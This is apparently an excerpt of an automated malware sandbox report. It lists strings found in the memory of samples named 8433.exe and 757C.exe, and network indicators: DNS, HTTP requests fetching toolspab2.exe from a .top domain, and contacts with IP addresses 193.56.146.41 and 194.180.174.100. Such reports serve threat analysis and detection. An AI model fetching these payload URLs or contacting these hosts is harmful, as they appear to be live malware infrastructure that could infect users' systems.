Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_java
Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_real
Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 8433.exe, 00000013.00000002.681982512.0000000003BD1000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.661066826.0000000002AB9000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
Source: 8433.exe, 00000013.00000002.680997678.0000000003AE4000.00000004.00000001.sdmp, 8433.exe, 00000013.00000002.681982512.0000000003BD1000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.664512356.0000000002D24000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.661066826.0000000002AB9000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: 8433.exe, 00000013.00000002.681982512.0000000003BD1000.00000004.00000001.sdmp, 757C.exe, 00000016.00000002.661066826.0000000002AB9000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: svchost.exe, 0000000D.00000003.487674063.000001D408BA0000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000003.487832537.000001D408BD5000.00000004.00000001.sdmp String found in binary or memory: https://www.roblox.com/develop
Source: svchost.exe, 0000000D.00000003.487674063.000001D408BA0000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000003.487832537.000001D408BD5000.00000004.00000001.sdmp String found in binary or memory: https://www.roblox.com/info/privacy
Source: svchost.exe, 0000000D.00000003.465092159.000001D408B8B000.00000004.00000001.sdmp String found in binary or memory: https://www.tiktok.com/legal/report
Source: svchost.exe, 0000000D.00000003.465092159.000001D408B8B000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000003.465050962.000001D408BB3000.00000004.00000001.sdmp String found in binary or memory: https://www.tiktok.com/legal/report/feedback
Source: unknown DNS traffic detected: queries for: naghenrietti1.top
Source: global traffic HTTP traffic detected: GET /hcdrom1 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: t.me
Source: global traffic HTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacy-toolz-for-you-403.top
Source: global traffic HTTP traffic detected: GET /a.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 193.56.146.41:9080
Source: global traffic HTTP traffic detected: GET //l/f/1pHWJnwB3dP17SpzF3sp/6cbf9ba43fa4774c97b7a910fd83e29808663306 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.100
Source: unknown Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown TCP traffic detected without corresponding DNS query: 216.128.137.31
Source: unknown TCP traffic detected without corresponding DNS query: 216.128.137.31
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.41
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.41
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.41
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.41
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.41
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.41
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.41
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.41
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.41
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.41
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.41
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.41
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.41
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.41
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.41
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.41
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.41
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.41
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.41
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.41
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.41
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.41
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.41
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.41
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.41
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.41
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.41
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.41
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.41
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.41
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.41
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.41
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.41
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.41
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.41
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.41
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.41
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.41
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.41
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.41
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.41
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.41
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.41
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.41
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.41
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.41
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.41
Source: unknown TCP traffic detected without corresponding DNS query: 193.56.146.41
Source: svchost.exe, 0000000D.00000003.488991291.000001D408B9F000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","A equals www.facebook.com (Facebook)
Source: svchost.exe, 0000000D.00000003.488991291.000001D408B9F000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","A equals www.twitter.com (Twitter)
Source: svchost.exe, 0000000D.00000003.488991291.000001D408B9F000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-09-21T12:54:52.3734768Z||.||0e318158-1bd5-4e26-98c4-0ca8e667cae7||1152921505693927011||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 0000000D.00000003.488991291.000001D408B9F000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-09-21T12:54:52.3734768Z||.||0e318158-1bd5-4e26-98c4-0ca8e667cae7||1152921505693927011||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 0000000D.00000003.488991291.000001D408B9F000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY", equals www.facebook.com (Facebook)
Source: svchost.exe, 0000000D.00000003.488991291.000001D408B9F000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY", equals www.twitter.com (Twitter)
Source: svchost.exe, 0000000D.00000003.463830927.000001D40901D000.00000004.00000001.sdmp String found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e
Source: svchost.exe, 0000000D.00000003.463830927.000001D40901D000.00000004.00000001.sdmp String found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e
Source: svchost.exe, 0000000D.00000003.463830927.000001D40901D000.00000004.00000001.sdmp String found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e
